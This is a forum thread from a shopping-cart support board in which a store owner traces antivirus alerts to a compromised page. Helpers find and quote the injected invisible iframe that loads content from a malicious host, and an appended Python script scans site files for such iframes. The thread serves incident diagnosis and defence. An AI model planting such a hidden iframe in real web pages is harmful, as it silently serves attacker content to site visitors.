  1. #1
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    A VIRAL Problem!

    Hello Everyone,

    I've discovered a horrible problem with my unfinished "shop"
    **link to site removed**

    When viewed by IE on Win XP I get a viral warning from my AV software **link removed**

    When viewed by Opera I get a message that tells me that http.....xbtuavnxbb.biz/dl/adv493.php can not be accessed. This is not a file on my site, I presume it's a "hijack" URL from a viral source.

    In Firefox everything works fine! No warnings, no AV software intervention.

    I've removed the virus (Hacktool.IE.Exploit) in the usual manner - switch off "restore" in XP, scan, delete file, reboot etc. etc. The AV software is not activated when I browse other sites using IE BUT as soon as I open my ZC Store page I immediately get the alert again.

    Has anyone else encountered a similar problem? What's more, is this virus resident in the ZC files on my server?

    Any ideas?

    Many Thanks,

    G
    Last edited by Kim; 26 Jun 2006 at 10:05 PM.

  2. #2
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    That's a nasty one.....

    Not sure where it's being triggered from, but here's a few ideas to check:
    - iframe link:
    Code:
    <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
    - all your template images ... to be sure nothing's embedded
    - your no-right-click javascript
    - and your flash content .... and maybe also the OBJECT/EMBED code you're using to load/init the flash content.


    (We deactivated the links in your post because they even caused the JS to start infecting our test machines....)

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  3. #3
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    I think it's the iframe code, based on this Googled result:

    http://forums.startlogic.com/viewtopic.php?t=547

  4. #4
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    yup -- and the iframe appears to be coming from your define-page-main code (see the last line here):
    HTML Code:
    <font color="#000080">
    <img vspace="0" hspace="0" border="0" align="bottom" src="http://sccambria-online-linux-store.com/pics/thankyou_greeting.jpg" width="185" height="79"/></font></strong></font><p><strong>
    <font size="3" color="#cc0000">
    <span style="color: #000080;"><font face="Arial">If you're a </font>
    </span> </font> <font style="font-family: Arial; " size="4">
    L<font color="#FF0000">I</font>NUX</font><font size="4" color="#000080" style="font-family: Arial; font-weight: bold"> </font>
    <font size="3" style="color: #000080;" face="Arial" color="#cc0000">enthusiast you'll find EVERYTHING you need right here - and at the most competitive prices available anywhere on the Internet. Many items (like programmes and utilities etc.) are <span style="font-style: italic;">ABSOLUTELY FREE!</span></font></strong></p>
    <p><strong>
    <font face="Arial" color="#ff3366"><font color="#000080">I</font><span style="color: #000080;">f you use one of the proprietary Operating System (like Microsoft) then there's still lots of HARDWARE, SOFTWARE and DOWNLOADS for you to choose from also. If you're thinking of migrating to  </span>
    </font> <font style="font-family: Arial; " size="4">
    L<font color="#FF0000">I</font>NUX</font><font face="Arial" color="#ff3366"><span style="color: #000080;"> then this is 
    <i>DEFINITELY THE PLACE FOR YOU!</i></span><i><font color="#000080">
    </font>
    </i>
    </font></strong></p>
    <p><strong>
    <font color="#000080" face="Arial">Whether you're looking for a LINSPIRE LINUX 
    Distro or a &quot;READY TO GO&quot; pre-built and tested S.C.Cambria Desktop or Laptop 
    Computer System - we have it all for you.</font></strong></p>
    <p><strong>
    <font color="#000080" face="Arial">All the hardware listed in our shop - which 
    is available for immediate online purchase - has been fully tested and is 
    compatible with the latest LINSPIRE 5.0 Desktop and Laptop Operating System. 
    From a humble Mouse to a Wireless Server you'll find it ALL in our shop!Don't 
    forget to check out our
    </font>
    </strong></p>
    <p><font face="Arial"><a title="Goto our HOSTING PLANS info. page" href="http://www.sccambria.com/hosting_plans_comparison.htm" target="_blank"><strong>
    <font color="#FF0000">WEB HOSTING PLANS</font></strong></a><font color="#000080">
    </font>  <a href="http://www.sccambria.com/hosting_plans_comparison.htm">
    <font color="#000080">
    <a target="_blank" href="http://www.sccambria.com/hosting_plans_comparison.htm">
    <img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a><font color="#000080">&nbsp;&nbsp;&nbsp;&nbsp;
    <font size="4">&nbsp;</font></font><a title="See our WEB DESIGN SERVICE page" href="http://www.sccambria.com/webdesign.htm" target="_blank"><strong><font color="#FF0000">WEB-SITE DESIGN SERVICES</font></strong></a><font color="#000080">
    </font></font> <a href="http://www.sccambria.com/webdesign.htm">
    <font color="#000080">
    <a target="_blank" href="http://www.sccambria.com/webdesign.htm">
    <img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a></p><iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

  5. #5
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    You're a star DrByte!

    Now you're going to have to pass this by me VERY slowly.

    So (according to the last line in the copy of the code you showed in your last post) the offending code is contained in that line of my define-page-main code file. I.e. <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

    If this is so then
    a) Will deleting that section of spurious code rectify my problem?

    b) Where did that information come from in the first place? Could it be the template I used? And

    c) Why is the problem apparent in IE & Opera but not Firefox?

    Thanks,

    G

  6. #6
    Join Date
    Sep 2005
    Location
    The Internets
    Posts
    190
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

    Just seems a bit off...
    Make regular site and database backups!

  7. #7
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    IF I've read that thread on http://forums.startlogic.com/viewtopic.php?t=547 correctly then the problem could be with the server itself. I'm getting very jittery about this! I've got other sites on the same server.

    If the spurious insert can get planted in one line of code what's stopping it happening to multiples of files? In which case it would be absolutely disastrous.

    HELP!!!

    G
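
Added example (not part of the original thread or of Zen Cart): a way to check every page file under a web root for the kind of invisible, off-site iframe found above, which addresses the worry that more than one file may carry it. The names `find_hidden_iframes`, `scan_tree`, `own_hosts` and the hosts in `SAMPLE` are assumptions made for this illustration.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Constructed sample: same attribute shape as the tag in the thread, placeholder hosts.
SAMPLE = ('<p>Welcome to the shop</p>\n'
          '<iframe width="1" height="1" src="http://injected.example/x.php" '
          'style="border: 0;"></iframe>\n'
          '<iframe width="560" height="315" src="http://video.example/e/1"></iframe>\n')

def _pixels(value):
    m = re.match(r"\s*(\d+)", value or "")  # leading integer, e.g. "1" or "1px"
    return int(m.group(1)) if m else None

class IframeFinder(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.hits = []  # (line number, src) of each suspicious iframe

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        sizes = (_pixels(a.get("width")), _pixels(a.get("height")))
        tiny = any(p is not None and p <= 2 for p in sizes)
        hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
        # Flag only frames that are both off-site and effectively invisible.
        if host and host not in self.own_hosts and (tiny or hidden):
            self.hits.append((self.getpos()[0], a.get("src")))

def find_hidden_iframes(html, own_hosts):
    finder = IframeFinder(own_hosts)
    finder.feed(html)
    finder.close()
    return finder.hits

def scan_tree(root, own_hosts, exts=(".php", ".html", ".htm", ".tpl")):
    report = {}  # file path -> suspicious iframes found in it
    for folder, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(exts)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read(), own_hosts)
            if hits:
                report[path] = hits
    return report
```

Run `scan_tree` against a downloaded copy of the site with the shop's own hostnames in `own_hosts`. It reads files only, so a tag written out by script at run time or held outside the scanned tree will not show up.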

 

 
